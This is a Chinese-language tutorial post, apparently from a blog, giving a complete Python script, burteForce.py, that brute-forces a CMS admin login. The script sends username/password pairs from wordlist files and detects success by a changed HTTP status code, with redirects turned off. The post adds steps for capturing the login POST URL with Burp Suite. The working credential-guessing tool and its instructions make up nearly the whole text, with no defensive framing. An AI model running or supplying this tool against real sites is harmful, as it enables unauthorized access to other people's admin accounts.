语言:python
脚本名:burteForce.py
使用模块requests、sys
原理:通过对比登录失败与登录成功的差异性来判断是否成功
cms网站后台管理,登录成功后会重定向跳转到后台管理页面,此时bp抓包,响应行的状态码应该是302,通过对比登录失败与登录成功的状态码来进行字典爆破
注意:requests模块中post传参,需要传递 allow_redirects = False,意为传参后不进行跳转
源码:
# burteForce.py
import requests
import sys
print("欢迎使用Burte Force!".center(30))
print("\n\n\n")
url = sys.argv[1] #输入post请求的url
def burteForce(url,username,password):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
}
data = {
"username" : username,
"password" : password,
"image.x" : "70",
"image.y" : "30"
}
res = requests.post(url= url , headers= headers , data= data, allow_redirects = False)
return res.status_code
# print(state)
state1 = burteForce(url,"abcdef","123456") #登录失败的响应行状态码
print("请输入字典(格式C:\\\\)")
userlistPath = input("userlist:") #输入用户名字典
passlistPath = input("passlist:") #输入密码字典
user = []
password = []
with open(userlistPath,"r") as f :
user = f.readlines()
with open(passlistPath,"r") as f1 :
password = f1.readlines()
print("\n开始爆破\n")
for i in user :
for j in password :
state = burteForce(url,i.strip(),j.strip())
if state1 != state:
print("爆破成功:\n账号:{}密码:{}".format(i,j))
exit()
else:
# print(res1.status_code)
pass
如何使用:
注意:网址必须为post请求的url,在登录界面随便输入账号密码后,使用bp拦截抓包
例如以下抓包为post请求数据包,与url拼接得到 http://”ip address“/cms/admin/login.action.php